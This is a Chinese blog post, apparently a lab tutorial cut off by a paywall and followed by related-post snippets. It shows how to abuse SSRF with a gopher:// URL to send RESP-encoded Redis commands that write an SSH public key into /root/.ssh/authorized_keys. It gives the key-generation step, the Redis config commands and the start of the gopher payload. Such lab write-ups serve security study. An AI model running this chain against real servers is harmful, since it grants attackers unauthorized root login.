ssrf结合redis写入公钥

已于 2024-07-08 19:48:35 修改
阅读量1.2k 收藏 22
点赞数 25
文章标签: centos linux 运维
于 2024-07-05 11:24:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65540912/article/details/140102124
版权

目录

centos

1、kali生成密钥

2、redis数据库写入公钥

3、通过ssrf进行写入公钥

ubuntu

我这里用了Web-Redis-Lab漏洞环境来演示

攻击机kali:192.168.168.128

目标机:192.168.168.134

centos

1、kali生成密钥

使用ssh-keygen -t rsa生成密钥,id_rsa是私钥,id_rsa.pub是公钥,我们要用的就是公钥

ssh-keygen -t rsa

2、redis数据库写入公钥

将上面kali中的id_rsa.pub的公钥内容取出,通过redis数据库将公钥写入到/root/.ssh下,注意的是,写入的文件名必须是authorized_keys

flushall
set 1 '公钥内容'
config set dir /root/.ssh
config set dbfilename authorized_keys
save

Redis服务器与客户端通过RESP协议通信,所以需要将上面的内容编译为RESR协议的格式:

gopher://127.0.0.1:6379/_*1

$8

flushall

*3

$3

set

$1

1

$567


 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzM2dS0hJe/04kvRqW8zPSs+T1/XT0hWU+RVvvoSd3QhMhhaMoFLsajUBZ4L3X35Jrp5XrHFGAlIovvFT53L7/Q7ofAzsRaK1nnWU24KJe5Be/xnRNNFEbdz/FE7pmuCHerW5/MR8av9AMNwwtHWP+SEeb8rqBrB72FHQEVce4rBGauiPnmIdC0G7VRCc0zUAJGCK4Q1jBZz70wzQNrENm38DsyweXAs8Q2bntzXGOjgWpSXudqGVOxHYAfft6KwnyV+wtU3wQWGFwgSRfu4qiqx9CYfd9tQubSAuJ+MIqJs9MBauQjJNa+jO+QqSUWoE3CZrzQrQiSgxZWxF4U8sb5ijyaKuLZ3+T1IDcAwx6ecANTgFG1RpwE23ktna/jynqdYdS3JNjFqTSI4f

最低0.47元/天 解锁文章
赵梓鑫
关注
ssrf+redis
qq_45213259的博客
11-30 3973
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机中搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机中安装redis vps:windows10(本机) ip:10.133.164.81 在windows中安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
ssrf漏洞详解以及ssrf-lab
wo41ge的博客
12-17 947
SSRF漏洞分析 漏洞地址 SSRF漏洞详解 这个就很nice! 存在SSRF漏洞的站点主要利用四个协议,分别是http协议、file协议、gopher协议、dict协议 http协议:进行内网的ip扫描、端口探测 file协议:通过file协议可以读取主机内任意文件。 dict协议:一个字典服务器协议,允许客户端在使用过程中访问更多字典并且该协议约定服务器端侦听端口号:2628,通过dict协议可获取本地redis服务配置信息。 redis服务是在6379端口开启的 gopher协议:通过gopher协议
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3540
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(未授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
SSRF 302跳转攻击redis写入ssh公钥实现远程登录
m0_70638961的博客
08-24 647
ssh -i id_rsa root@IP地址登录成功。
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2856
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
redis未授权写入ssh公钥登录
m0_46576302的博客
09-09 5044
利用redis的备份功能,写入ssh公钥
ssrf结合redis未授权getshell
07-07 1484
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
Root me CTF all the day靶场ssrf+redis漏洞
M372109150的博客
10-10 1631
本篇介绍了root me CTF all the day靶场的SSRF BOX中的漏洞,使用SSRF+redis 获取内网主机权限,利用SSRF来对redis的未授权访问执行命令。从而达到获取主机权限的目的。
Redis未授权访问及配合SSRF总结
最新发布
saber的博客
10-24 1426
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行文件操作,并且公匙登录。
Xshell工具利用Redis 6379写入SSH公钥漏洞
maple_leaf
05-03 700
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
记一次学习过程(redis的编译安装,以及有关redis漏洞的学习,包括redis未授权写入ssh公钥redis写入木马、redis主从复制漏洞linux版)同时记录几个威胁分析平台
banliyaoguai的博客
08-03 1072
这个东西的流程是你发现了一个网站,然后你扫描对方端口,发现6379端口开着,而且通过一些其他漏洞可以登陆上redis后,你在redis中执行操作获取webshell权限。测试公私钥的时候不要在你的攻击机子和redis的服务器的机子上测试,或者你把测试完成的文件在服务器上删掉,删掉之前记得保存。这个是你冒充redis的主服务器,让redis从服务器下载木马(这里使用工具)这是你已经连接上了redis,你在redis中操作,在redis写入公钥。(下图是测试出现问题的情况,没出现问题的情况忘记截图了)
13,Redis备份写入Shell以及公钥
m0_64040060的博客
09-24 506
1. redis服务绑定在0.0.0.0:6379端口,而且信任了其他IP,导致了Redis服务暴露在公网上。3.如果Redis服务以root身份运行,可以给root用户写入SSH公钥文件,直接通过SSH登陆服务器。浏览器访问: http://127.0.0.1/demo.php?输入save保存即可在访问在/var/www/html下的demo.php。启动Redis服务: # ./redis-server。a、redis 服务以 root 账户运行。连接Redis服务: # ./redis-cli。
Redis数据库未授权私钥
weixin_61425169的博客
02-20 899
Redis是一个key-value存储系统,拥有很强大的功能,redis是用ANSI C语言编、支持网络、可基于内存和可持久化的日志型键值对数据库,并提供多种语言的API。reids默认端口是6379。
web中间件漏洞-Redis漏洞未授权访问漏洞-webshell、ssh公钥
Alsn86的博客
06-22 609
利用redis未授权访问、攻击机向服务器写入webshell从服务器查看写入的webshell菜刀连接。
SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)
L2329794714的博客
11-20 3454
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
RSA公钥存储在Redis中的作用
chen的博客
07-07 482
RSA(Rivest–Shamir–Adleman)是一种广泛使用的公钥加密算法。它通过一对密钥(公钥和私钥)来进行加密和解密。公钥用于加密数据,私钥用于解密数据。这种非对称加密方式确保了即使公钥被公开,数据的安全性也能得到保障,因为只有持有私钥的人才能解密数据。
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2691
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
redis攻防-ssh登录、主从复制、未授权访问、计划任务、webshell
weixin_46626737的博客
06-30 767
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
redis服务器远程漏洞-公钥-相关原理
weixin_33877092的博客
11-12 436
漏洞原理及复现在复现前,先介绍两个基本所要了解的基础知识:1) SSH免密码登录,Linux下可以设置SSH免密码登录,方法为使用"公私钥"认证,即首先在客户端上创建一对公私钥 (公钥文件:~/.ssh/id_rsa.pub;私钥文件:~/.ssh/id_rsa)。然后把公钥放到服务器上(~/.ssh/authorized_keys), 自己保留好私钥.在使用ssh登录时,s...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值